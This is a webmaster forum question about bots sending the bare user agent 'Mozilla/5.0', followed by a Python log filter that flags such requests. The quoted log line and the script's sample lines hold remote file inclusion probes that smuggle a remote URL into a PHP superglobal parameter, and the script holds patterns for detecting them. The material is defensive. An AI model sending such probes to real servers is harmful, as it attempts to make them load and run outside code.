I am trying to get some details about a thorn in my server-side ;-)
For a couple of years I have been blocking attack bots with the exact user agent: "Mozilla/5.0"
There must be a hacktool with that default UA, but I cannot find any details about it.
Evidence (from Korean IP space):
218.38.xyz.xyz - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/columbus/heheh.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"
Do any of you guys know what hack tool uses that default user agent? Most of these attacks have APNIC IP addresses, which I look up, convert into CIDRs, and add to my .htaccess and iptables Chinese Blocklists. The exploits are blocked by various rules in my .htaccess. I'm just curious about this user agent.
Thanks in advance; Wiz
[edited by: incrediBILL at 8:17 pm (utc) on Feb 27, 2010]
[edit reason] removed specifics to live bot net [/edit]
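The pattern described in the post, as an added example that is not part of the original thread: a small log filter that flags Apache combined-format lines carrying the exact bare "Mozilla/5.0" user agent, a query parameter whose value is a remote URL, or an attempt to set a PHP superglobal through the query string. The function names, reason labels and sample lines are constructed for illustration; the IPs come from documentation ranges.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A parameter whose value is itself a remote URL (remote file inclusion probe).
REMOTE_VALUE_RE = re.compile(r'[?&][^=&]*=(?:https?|ftp)://', re.I)
# An attempt to overwrite a PHP superglobal via the query string.
SUPERGLOBAL_RE = re.compile(r'[?&](?:_(?:SERVER|GET|POST|COOKIE|ENV|REQUEST|FILES|SESSION)|GLOBALS)\[', re.I)
BARE_UA = "Mozilla/5.0"  # exact match only; real browsers append platform details

def classify(line):
    """Return (ip, reasons) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    uri = unquote(m.group("uri"))  # decode %3A%2F%2F so encoded probes are caught too
    reasons = []
    if m.group("ua") == BARE_UA:
        reasons.append("bare-ua")
    if REMOTE_VALUE_RE.search(uri):
        reasons.append("remote-url-param")
    if SUPERGLOBAL_RE.search(uri):
        reasons.append("superglobal-override")
    return m.group("ip"), reasons

def summarize(lines):
    """Map each source IP to the sorted list of reasons it triggered."""
    hits = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            hits.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(reasons) for ip, reasons in hits.items()}

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [26/Feb/2010:23:00:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://example.com/x.txt? HTTP/1.1" 403 421 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [26/Feb/2010:23:01:02 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:1.9.2) Gecko/20100115 Firefox/3.6"',
    '203.0.113.9 - - [26/Feb/2010:23:02:40 -0700] "GET / HTTP/1.1" 403 421 "-" "Mozilla/5.0"',
    '198.51.100.33 - - [26/Feb/2010:23:03:11 -0700] "GET /index.php?page=http%3A%2F%2Fexample.com%2Fx.txt HTTP/1.1" 403 421 "-" "Mozilla/5.0 (X11; Linux i686)"',
]

if __name__ == "__main__":
    for ip, reasons in summarize(SAMPLE).items():
        print(ip, ",".join(reasons))
```

The remote-URL check will also match legitimate parameters that carry a URL, such as redirect or share links, so review its hits before turning them into block rules.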